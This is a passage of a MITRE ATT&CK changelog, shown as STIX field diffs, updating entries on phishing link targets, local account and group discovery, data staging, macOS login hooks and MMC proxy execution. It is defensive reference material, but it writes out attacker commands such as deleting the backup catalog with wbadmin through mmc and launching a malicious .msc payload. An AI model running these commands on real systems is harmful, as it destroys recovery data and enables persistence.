| external_references[3]['url'] | https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ | https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update |
| external_references[4]['source_name'] | OSX.Dok Malware | OSX Keydnap malware |
| external_references[4]['description'] | Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017. | Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. |
| external_references[4]['url'] | https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ | https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ |
| external_references[5]['source_name'] | Sofacy Komplex Trojan | Methods of Mac Malware Persistence |
| external_references[5]['description'] | Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. |
| external_references[5]['url'] | https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf |
| external_references[6]['source_name'] | Methods of Mac Malware Persistence | OSX Malware Detection |
| external_references[6]['description'] | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. |
| external_references[6]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf |
| external_references[7]['source_name'] | OSX Malware Detection | Antiquated Mac Malware |
| external_references[7]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017. |
| external_references[7]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ |
| external_references[8]['source_name'] | OceanLotus for OS X | OSX.Dok Malware |
| external_references[8]['description'] | Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. | Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017. |
| external_references[8]['url'] | https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update | https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ |
| x_mitre_data_sources[2] | File: File Modification | Service: Service Creation |
| x_mitre_version | 1.3 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Creation |
| Old Description | New Description |
|---|---|
| Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. 
| Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. 
Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:28:41.565000+00:00 | 2022-10-20 20:15:57.855000+00:00 |
| description | Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. 
| Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. 
Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) |
| external_references[1]['source_name'] | Malwarebytes Silent Librarian October 2020 | Netskope GCP Redirection |
| external_references[1]['description'] | Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021. | Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022. |
| external_references[1]['url'] | https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ | https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection |
| external_references[2]['source_name'] | Proofpoint TA407 September 2019 | Netskope Cloud Phishing |
| external_references[2]['description'] | Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021. | Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022. |
| external_references[2]['url'] | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian | https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Malwarebytes Silent Librarian October 2020', 'description': 'Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.', 'url': 'https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/'} | |
| external_references | {'source_name': 'Intezer App Service Phishing', 'description': 'Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.', 'url': 'https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/'} | |
| external_references | {'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'} |
| Description |
|---|
Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-28 18:05:24.567000+00:00 | 2022-08-25 13:04:39.404000+00:00 |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Miriam Wiesner, @miriamxyra, Microsoft Security | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_data_sources | Group: Group Enumeration |
| Old Description | New Description |
|---|---|
| Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. | Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Massimiliano Romano, BT Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-26 19:23:54.854000+00:00 | 2022-04-21 16:07:10.829000+00:00 |
| description | Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. | Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021) |
| x_mitre_detection | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). 
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'} | |
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| Description |
|---|
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Harshal Tupsamudre, Qualys', 'Miriam Wiesner, @miriamxyra, Microsoft Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-26 17:48:27.871000+00:00 | 2022-08-25 13:03:08.484000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Group: Group Enumeration |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook) Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. | Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)
Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 16:49:15.786000+00:00 | 2022-04-20 16:42:05.094000+00:00 |
| name | Logon Script (Mac) | Login Hook |
| description | Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook) Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. | Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)
Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) |
| external_references[1]['source_name'] | creating login hook | Login Scripts Apple Dev |
| external_references[1]['description'] | Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved July 17, 2017. | Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022. |
| external_references[1]['url'] | https://support.apple.com/de-at/HT2420 | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html |
| external_references[2]['source_name'] | S1 macOs Persistence | LoginWindowScripts Apple Dev |
| external_references[2]['description'] | Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020. | Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022. |
| external_references[2]['url'] | https://www.sentinelone.com/blog/how-malware-persists-on-macos/ | https://developer.apple.com/documentation/devicemanagement/loginwindowscripts |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wardle Persistence Chapter', 'description': 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.', 'url': 'https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf'} | |
| external_references | {'source_name': 'S1 macOs Persistence', 'description': 'Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.', 'url': 'https://www.sentinelone.com/blog/how-malware-persists-on-macos/'} |
| Old Description | New Description |
|---|---|
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview) For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal) Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.
Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 00:13:18.889000+00:00 | 2022-05-20 17:41:16.112000+00:00 |
| description | Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.
Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.
Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
| external_references[1]['source_name'] | win_mmc | abusing_com_reg |
| external_references[1]['description'] | Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021. | bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
| external_references[2]['source_name'] | what_is_mmc | mmc_vulns |
| external_references[2]['description'] | Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021. | Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console | https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/ |
| external_references[4]['source_name'] | win_wbadmin_delete_catalog | win_mmc |
| external_references[4]['description'] | Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021. | Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc |
| external_references[5]['source_name'] | phobos_virustotal | win_wbadmin_delete_catalog |
